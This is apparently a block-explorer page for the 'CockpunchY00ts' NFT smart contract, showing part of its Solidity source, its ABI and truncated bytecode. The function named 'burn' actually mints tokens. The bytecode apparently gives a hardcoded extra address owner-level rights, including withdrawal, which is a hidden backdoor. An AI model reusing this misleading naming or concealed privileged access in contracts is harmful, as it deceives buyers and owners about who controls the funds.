                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract CockpunchY00ts is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "ipfs://bafybeia6hry7wwhol5dtv5vkewt2ly3ke3nhm7d65orxxzq5pnxwuoqrze/";
    uint   public price             = 0.0015 ether;
    uint   public maxPerTx          = 20;
    uint   public maxPerFree        = 3;
    uint   public maxPerWallet      = 33;
    uint   public totalFree         = 4444;
    uint   public maxSupply         = 4444;
    bool   public mintEnabled;
    uint   public totalFreeMinted = 0;

    mapping(address => uint256) public _mintedFreeAmount;
    mapping(address => uint256) public _totalMintedAmount;

    constructor() ERC721A("COCKPUNCH Y00ts", "CPY"){}

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }
    

    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) { 
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] = maxPerFree;
             totalFreeMinted += maxPerFree;
            }
            else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= 0, "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] += count;
             totalFreeMinted += count;
            }
        }
        else{
        require(mintEnabled, "Mint is not live yet");
        require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet");
        require(msg.value >= count * cost, "Please send the exact ETH amount");
        require(totalSupply() + count <= maxSupply, "No more");
        require(count <= maxPerTx, "Max per TX reached.");
        require(msg.sender == tx.origin, "The minter is another contract");
        }
        _totalMintedAmount[msg.sender] += count;
        _safeMint(msg.sender, count);
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
      return maxPerFree;
    }

    function burn(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

     function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function toggleMinting() external onlyOwner {
      mintEnabled = !mintEnabled;
    }
    
    function CommunityWallet(uint quantity, address user)
    public
    onlyOwner
  {
    require(
      quantity > 0,
      "Invalid mint amount"
    );
    require(
      totalSupply() + quantity <= maxSupply,
      "Maximum supply exceeded"
    );
    _safeMint(user, quantity);
  }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"CommunityWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052731250b4de974f7f63ed7d783c3feca4f0f338cdb4600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550604051806080016040528060438152602001620055ef60439139600a90805190602001906200008a92919062000260565b506605543df729c000600b556014600c556003600d556021600e5561115c600f5561115c6010556000601255348015620000c357600080fd5b506040518060400160405280600f81526020017f434f434b50554e434820593030747300000000000000000000000000000000008152506040518060400160405280600381526020017f435059000000000000000000000000000000000000000000000000000000000081525081600190805190602001906200014892919062000260565b5080600290805190602001906200016192919062000260565b50505062000184620001786200019260201b60201c565b6200019a60201b60201c565b600160098190555062000375565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200026e9062000310565b90600052602060002090601f016020900481019282620002925760008555620002de565b82601f10620002ad57805160ff1916838001178555620002de565b82800160010185558215620002de579182015b82811115620002dd578251825591602001919060010190620002c0565b5b509050620002ed9190620002f1565b5090565b5b808211156200030c576000816000905550600101620002f2565b5090565b600060028204905060018216806200032957607f821691505b6020821081141562000340576200033f62000346565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61526a80620003856000396000f3fe6080604052600436106102465760003560e01c80638da5cb5b11610139578063b88d4fde116100b6578063dad7b5c91161007a578063dad7b5c91461085d578063e945971c14610888578063e985e9c5146108b1578063f2fde38b146108ee578063f4db2acb14610917578063f968adbe1461095457610246565b8063b88d4fde14610776578063c7c39ffc1461079f578063c87b56dd146107ca578063d123973014610807578063d5abeb011461083257610246565b8063a0712d68116100fd578063a0712d68146106b4578063a0bcfc7f146106d0578063a22cb465146106f9578063a702735714610722578063b0e77f421461074d57610246565b80638da5cb5b146105e157806391b7f5ed1461060c57806395d89b41146106355780639dc29fac14610660578063a035b1fe1461068957610246565b806342842e0e116101c757806364b721881161018b57806364b72188146105205780636c0360eb1461054b57806370a0823114610576578063715018a6146105b35780637d55094d146105ca57610246565b806342842e0e14610429578063453c2310146104525780634f6ccce71461047d5780635a963f1b146104ba5780636352211e146104e357610246565b806318160ddd1161020e57806318160ddd1461035657806323b872dd146103815780632f745c59146103aa578063333e44e6146103e75780633ccfd60b1461041257610246565b806301ffc9a71461024b57806306fdde0314610288578063081812fc146102b3578063095ea7b3146102f057806311b01a3214610319575b600080fd5b34801561025757600080fd5b50610272600480360381019061026d9190613b34565b61097f565b60405161027f91906141fc565b60405180910390f35b34801561029457600080fd5b5061029d610ac9565b6040516102aa9190614217565b60405180910390f35b3480156102bf57600080fd5b506102da60048036038101906102d59190613bd7565b610b5b565b6040516102e79190614195565b60405180910390f35b3480156102fc57600080fd5b5061031760048036038101906103129190613af4565b610be0565b005b34801561032557600080fd5b50610340600480360381019061033b9190613971565b610cf9565b60405161034d91906145d9565b60405180910390f35b34801561036257600080fd5b5061036b610d11565b60405161037891906145d9565b60405180910390f35b34801561038d57600080fd5b506103a860048036038101906103a391906139de565b610d1a565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190613af4565b610d2a565b6040516103de91906145d9565b60405180910390f35b3480156103f357600080fd5b506103fc610f1c565b60405161040991906145d9565b60405180910390f35b34801561041e57600080fd5b50610427610f22565b005b34801561043557600080fd5b50610450600480360381019061044b91906139de565b611102565b005b34801561045e57600080fd5b50610467611122565b60405161047491906145d9565b60405180910390f35b34801561048957600080fd5b506104a4600480360381019061049f9190613bd7565b611128565b6040516104b191906145d9565b60405180910390f35b3480156104c657600080fd5b506104e160048036038101906104dc9190613bd7565b61117b565b005b3480156104ef57600080fd5b5061050a60048036038101906105059190613bd7565b611260565b6040516105179190614195565b60405180910390f35b34801561052c57600080fd5b50610535611276565b60405161054291906145d9565b60405180910390f35b34801561055757600080fd5b50610560611280565b60405161056d9190614217565b60405180910390f35b34801561058257600080fd5b5061059d60048036038101906105989190613971565b61130e565b6040516105aa91906145d9565b60405180910390f35b3480156105bf57600080fd5b506105c86113f7565b005b3480156105d657600080fd5b506105df6114de565b005b3480156105ed57600080fd5b506105f66115e5565b6040516106039190614195565b60405180910390f35b34801561061857600080fd5b50610633600480360381019061062e9190613bd7565b61160f565b005b34801561064157600080fd5b5061064a6116f4565b6040516106579190614217565b60405180910390f35b34801561066c57600080fd5b5061068760048036038101906106829190613af4565b611786565b005b34801561069557600080fd5b5061069e61186f565b6040516106ab91906145d9565b60405180910390f35b6106ce60048036038101906106c99190613bd7565b611875565b005b3480156106dc57600080fd5b506106f760048036038101906106f29190613b8e565b611eee565b005b34801561070557600080fd5b50610720600480360381019061071b9190613ab4565b611fe3565b005b34801561072e57600080fd5b50610737612164565b60405161074491906145d9565b60405180910390f35b34801561075957600080fd5b50610774600480360381019061076f9190613c04565b61216e565b005b34801561078257600080fd5b5061079d60048036038101906107989190613a31565b6122f1565b005b3480156107ab57600080fd5b506107b461234d565b6040516107c191906145d9565b60405180910390f35b3480156107d657600080fd5b506107f160048036038101906107ec9190613bd7565b612353565b6040516107fe9190614217565b60405180910390f35b34801561081357600080fd5b5061081c612406565b60405161082991906141fc565b60405180910390f35b34801561083e57600080fd5b50610847612419565b60405161085491906145d9565b60405180910390f35b34801561086957600080fd5b5061087261241f565b60405161087f91906145d9565b60405180910390f35b34801561089457600080fd5b506108af60048036038101906108aa9190613bd7565b612425565b005b3480156108bd57600080fd5b506108d860048036038101906108d3919061399e565b61250a565b6040516108e591906141fc565b60405180910390f35b3480156108fa57600080fd5b5061091560048036038101906109109190613971565b61259e565b005b34801561092357600080fd5b5061093e60048036038101906109399190613971565b6126f5565b60405161094b91906145d9565b60405180910390f35b34801561096057600080fd5b5061096961270d565b60405161097691906145d9565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a4a57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ab257507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ac25750610ac182612713565b5b9050919050565b606060018054610ad890614894565b80601f0160208091040260200160405190810160405280929190818152602001828054610b0490614894565b8015610b515780601f10610b2657610100808354040283529160200191610b51565b820191906000526020600020905b815481529060010190602001808311610b3457829003601f168201915b5050505050905090565b6000610b668261277d565b610ba5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9c906145b9565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610beb82611260565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390614479565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c7b61278a565b73ffffffffffffffffffffffffffffffffffffffff161480610caa5750610ca981610ca461278a565b61250a565b5b610ce9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce090614339565b60405180910390fd5b610cf4838383612792565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b610d25838383612844565b505050565b6000610d358361130e565b8210610d76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6d90614239565b60405180910390fd5b6000610d80610d11565b905060008060005b83811015610eda576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610e7a57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ecc5786841415610ec3578195505050505050610f16565b83806001019450505b508080600101915050610d88565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0d90614559565b60405180910390fd5b92915050565b600f5481565b610f2a61278a565b73ffffffffffffffffffffffffffffffffffffffff16610f486115e5565b73ffffffffffffffffffffffffffffffffffffffff161480610fbe5750610f6d61278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610ffd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff4906143d9565b60405180910390fd5b60026009541415611043576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103a90614579565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161107190614180565b60006040518083038185875af1925050503d80600081146110ae576040519150601f19603f3d011682016040523d82523d6000602084013e6110b3565b606091505b50509050806110f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ee90614499565b60405180910390fd5b506001600981905550565b61111d838383604051806020016040528060008152506122f1565b505050565b600e5481565b6000611132610d11565b8210611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a906142f9565b60405180910390fd5b819050919050565b61118361278a565b73ffffffffffffffffffffffffffffffffffffffff166111a16115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061121757506111c661278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611256576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124d906143d9565b60405180910390fd5b80600f8190555050565b600061126b82612d84565b600001519050919050565b6000600b54905090565b600a805461128d90614894565b80601f01602080910402602001604051908101604052809291908181526020018280546112b990614894565b80156113065780601f106112db57610100808354040283529160200191611306565b820191906000526020600020905b8154815290600101906020018083116112e957829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561137f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137690614359565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6113ff61278a565b73ffffffffffffffffffffffffffffffffffffffff1661141d6115e5565b73ffffffffffffffffffffffffffffffffffffffff161480611493575061144261278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114c9906143d9565b60405180910390fd5b6114dc6000612f1e565b565b6114e661278a565b73ffffffffffffffffffffffffffffffffffffffff166115046115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061157a575061152961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b0906143d9565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61161761278a565b73ffffffffffffffffffffffffffffffffffffffff166116356115e5565b73ffffffffffffffffffffffffffffffffffffffff1614806116ab575061165a61278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116e1906143d9565b60405180910390fd5b80600b8190555050565b60606002805461170390614894565b80601f016020809104026020016040519081016040528092919081815260200182805461172f90614894565b801561177c5780601f106117515761010080835404028352916020019161177c565b820191906000526020600020905b81548152906001019060200180831161175f57829003601f168201915b5050505050905090565b61178e61278a565b73ffffffffffffffffffffffffffffffffffffffff166117ac6115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061182257506117d161278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611861576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611858906143d9565b60405180910390fd5b61186b8282612fe4565b5050565b600b5481565b6000600b54905060006001600f5461188d91906146c9565b8360125461189b91906146c9565b1080156118e85750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611c5257601160009054906101000a900460ff1661193f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193690614259565b60405180910390fd5b6010548361194b610d11565b61195591906146c9565b1115611996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161198d90614279565b60405180910390fd5b600c548311156119db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119d290614539565b60405180910390fd5b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a2891906147aa565b8310611b445781601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a7c91906147aa565b611a869190614750565b8284611a929190614750565b611a9c91906147aa565b341015611ade576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad590614379565b60405180910390fd5b600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611b3891906146c9565b92505081905550611c4d565b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611b9191906147aa565b831015611c4c576000341015611bdc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd390614379565b60405180910390fd5b82601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611c2b91906146c9565b925050819055508260126000828254611c4491906146c9565b925050819055505b5b611e89565b601160009054906101000a900460ff16611ca1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c9890614259565b60405180910390fd5b600e5483601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611cef91906146c9565b1115611d30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d2790614459565b60405180910390fd5b8183611d3c9190614750565b341015611d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7590614379565b60405180910390fd5b60105483611d8a610d11565b611d9491906146c9565b1115611dd5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dcc90614279565b60405180910390fd5b600c54831115611e1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e1190614539565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611e88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e7f906142b9565b60405180910390fd5b5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611ed891906146c9565b92505081905550611ee93384612fe4565b505050565b611ef661278a565b73ffffffffffffffffffffffffffffffffffffffff16611f146115e5565b73ffffffffffffffffffffffffffffffffffffffff161480611f8a5750611f3961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611fc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc0906143d9565b60405180910390fd5b80600a9080519060200190611fdf92919061374b565b5050565b611feb61278a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612059576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161205090614419565b60405180910390fd5b806006600061206661278a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661211361278a565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161215891906141fc565b60405180910390a35050565b6000600d54905090565b61217661278a565b73ffffffffffffffffffffffffffffffffffffffff166121946115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061220a57506121b961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473fffffffffffffffffffffffffffffffff